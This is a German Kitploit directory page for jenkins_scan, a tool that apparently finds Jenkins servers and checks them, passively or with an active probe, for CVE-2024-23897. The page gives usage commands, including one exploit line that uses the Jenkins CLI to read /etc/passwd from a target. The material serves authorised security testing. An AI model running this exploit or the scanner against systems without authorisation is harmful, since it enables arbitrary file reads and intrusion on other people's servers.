Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
jenkins_scan — Findet Jenkins-Umgebungen und prüft auf CVE-2024-23897 | Kitploit
Tools/GitHubGitHub/w41l3r/jenkins_scan
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubw41l3r/jenkins_scan

jenkins_scan

Findet Jenkins-Umgebungen und prüft auf CVE-2024-23897

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

jenkins_scan

Finde Jenkins-Umgebungen und prüfe auf CVE-2024-23897

Wie es funktioniert

Erkennung von Jenkins

Testet die Pfade: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json

Identifiziert über:

  1. Header X-Jenkins — zuverlässigster, liefert auch die Version
  2. Header X-Hudson — ältere Instanzen
  3. HTML-Body — Zeichenketten wie „login to jenkins“, „hudson.model“ usw.
  4. /api/json — Bestätigung durch die JSON-Struktur (_class, jobs, views)

Überprüfung von CVE-2024-23897

Passiv (Standard): vergleicht die erkannte Version mit den Schwellwerten:

  • Weekly: < 2.442 → anfällig
  • LTS: < 2.426.3 → anfällig

Aktiv (--active): sendet den Handshake des binären Jenkins-CLI-Protokolls über HTTP. Antwortet der Server mit 200 + Content-Type: application/octet-stream, bestätigt dies, dass der CLI-Kanal offen ist und der Exploit anwendbar ist.

Verwendung

Basis-Scan

python jenkins_scan.py -f urls.txt

Mit aktivem Probe + Burp als Proxy + Ausgabe in Datei

python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt

20 Threads, ausführlich, ohne Farbe (für Pipe/Grep)

python jenkins_scan.py -f urls.txt -t 20 -v --no-color

Manuellen Exploit bei anfälligem Ziel bestätigen

java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"

Tool herunterladen